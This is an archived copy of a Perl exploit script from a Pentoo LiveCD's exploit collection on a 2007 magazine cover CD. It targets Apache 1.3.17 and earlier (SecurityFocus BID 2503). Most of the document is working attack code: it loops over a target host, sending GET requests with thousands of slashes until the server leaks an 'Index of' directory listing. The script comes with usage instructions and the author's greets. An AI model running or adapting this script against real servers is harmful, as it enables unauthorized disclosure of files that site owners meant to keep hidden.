Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / apache / apache2.pl < prev next >

Wrap

Perl Script | 2005-02-12 | 7.1 KB | 215 lines

#!/usr/bin/perl # # orginal by farm9, Inc. (copyright 2001) # new modified code by Siberian (www.sentry-labs.com) # ######################################################################################## # # Note: This isn't the orginal exploit! This one was modified and partly rewritten. # # Changes: # # - help added (more user firendly :-) ) # - messages added # - exploit is now able to be executed on WinNT or 2k. # - uses perl version of BSD sockets (compatible to Windows) # # Rewriter's Note: I rewrote (I was bored to death that evening :-) ) some # of the code and made it esaier to use and cross platform compatible. # The old verion used a esaier but not that compaible way of socket stream communication. # Any network code was replaced by cross platform compatible BSD sockets. # (much better than any other stream method :-) ) # # Tested with Perl 5.6 (Linux) and ActivePerl 5.6 (Win32) # # Original comment and source is attached below. # ######################################################################################## # # Name: Apache Artificially Long Slash Path Directory Listing Exploit # Author: Matt Watchinski # Ref: SecurityFocus BID 2503 # # Affects: Apache 1.3.17 and below # Tested on: Apache 1.3.12 running on Debian 2.2 # # Info: This exploit tricks apache into returning a Index of the a directory # even if an index.html file is present. May not work on some OS's # # Details: http_request.c has a subroutine called ap_sub_req_lookup_file that in # very specific cases would feed stat() a filename that was longer than # stat() could handle. This would result in a condition where stat() # would return 0 and a directory index would be returned instead of the # default index.html. # # Code Fragment: /src/main/http_request.c # if (strchr(new_file, '/') == NULL) { # char *udir = ap_make_dirstr_parent(rnew->pool, r->uri); # # rnew->uri = ap_make_full_path(rnew->pool, udir, new_file); # rnew->filename = ap_make_full_path(rnew->pool, fdir, new_file); # ap_parse_uri(rnew, rnew->uri); /* fill in parsed_uri values */ # if (stat(rnew->filename, &rnew->finfo) < 0) { <-- Important part # rnew->finfo.st_mode = 0; # } # # Conditions: Mod_dir / Mod_autoindex / Mod_negotiation need to be enabled # The directory must also have the following Options enabled: # Indexes and MultiView # Some OS's have different conditions on the number of character # you have to pass to stat to make this work. If stat doesn't # return 0 for path names less than 8192 or so internal apache # buffer checks will stop this exploit from working. # # Debian needed around 4060 /'s to make this work. # # Greets: Special thanks to natasha who added a lot of debug to apache for me # while i was trying to figure out what had to be enabled to make this # exploit work. Also thanks to rfp for pointing out that MultiView # needed to be enabled. # # More Greets: Jeff for not shooting me :) <All your Cisco's belong to us> # Anne for being so sexy <I never though corporate espionage # would be so fun> # All my homies at farm9 # DJ Charles / DJ NoloN for the phat beats # Marty (go go gadget snort) # All my ex-bees # RnVjazpIaXZlcndvcmxk # # I think that wraps it up. Have fun. # # Usage: ./apacheIndex.pl <host> <port> <HI> <Low> # Where: Hi and low are the range for the number of / to try # #use IO::Socket; # #$low = $ARGV[3]; #Low number of slash characters to try #$hi = $ARGV[2]; #High number of slash characters to try #$port = $ARGV[1]; #Port to try to connect to #$host = $ARGV[0]; #Host to try to connect to # # Main loop. Not much to this exploit once you figure out what needed to # be enabled. Need to do some more testing on sub-dirs to see if it # works with them. It should. Also different OS's might use a different number # of /. Send me the numbers if you don't mind matt@farm9.com # #while($low <= $hi) #{ # #$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "TCP") or die "Connect Failed"; # # $url = ""; # $buffer = ""; # $end = ""; # # $url = "GET "; # $buffer = "/" x $low . " HTTP/1.0\r\n"; # $end = "\r\n\r\n"; # # $url = $url . $buffer . $end; # # print $socket "$url"; # while(<$socket>) # { # if($_ =~ "Index of") # { # print "Found the magic number: $low\n"; # print "Now go do it by hand to to see it all\n"; # close($socket); # exit; # } # } # # close($socket); # $low++; #} use Socket; print "Apache Artificially Long Slash Path Directory Listing Exploit\nSecurityFocus BID 2503\n\n"; print "original exploit code written by Matt Watchinski (www.farm9.com)\n"; print "rewritten and fixed by Siberian (www.sentry-labs.com)\n\n"; $host = shift || 'localhost'; #Host to try to connect to $port = shift || '80'; #Port to try to connect to $hi = shift || '100'; #High number of slash characters to try $low = shift || '0'; #Low number of slash characters to try if(($host eq 'localhost') && ($port eq '80') && ($hi eq '100') && ($low eq '0')) { print 'Usage: ./apache2.pl <host> <port> <HI> <Low>'; print "\nHi and low are the range for the number of \/ to try\n"; exit 0; } print "\ntarget: $host"; print "\nport: $port"; print "\nhi: $hi"; print "\nlow: $low\n\nStarting attack...\n\n"; # Main loop. Not much to this exploit once you figure out what needed to # be enabled. Need to do some more testing on sub-dirs to see if it # works with them. It should. Also different OS's might use a different number # of /. Send me the numbers if you don't mind matt@farm9.com $url = ""; $buffer = ""; $end = ""; #$port = (getservbyname($port, 'tcp') || die "No port!"); $iaddr = inet_aton($host); $paddr = sockaddr_in($port, $iaddr) or die "Faild ... SOCKADDR_IN!"; $proto = getprotobyname('tcp'); while($low <= $hi) { socket(SOCKY, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; connect(SOCKY, $paddr ) or die "connect: $!";; $url = "GET "; $buffer = "/" x $low . " HTTP/1.0\r\n"; $end = "\r\n\r\n"; $url = $url . $buffer . $end; print "."; send(SOCKY,$url,0) or die "send: $!";; while((recv(SOCKY,$out,1,0)) && ($out ne "")) { if($out eq "I") { recv(SOCKY,$out,1,0); if($out eq "n") { recv(SOCKY,$out,1,0); if($out eq "d") { recv(SOCKY,$out,1,0); if($out eq "e") { recv(SOCKY,$out,1,0); if($out eq "x") { recv(SOCKY,$out,1,0); if($out eq " ") { recv(SOCKY,$out,1,0); if($out eq "o") { recv(SOCKY,$out,1,0); if($out eq "f") { print "Found the magic number: $low\n"; print "Now go do it by hand to to see it all\n"; close(SOCKY); exit 0; } } } } } } } } } close(SOCKY); $low++; } print "\n\nNot vulnerable :-(\nCheck some other numbers.\n";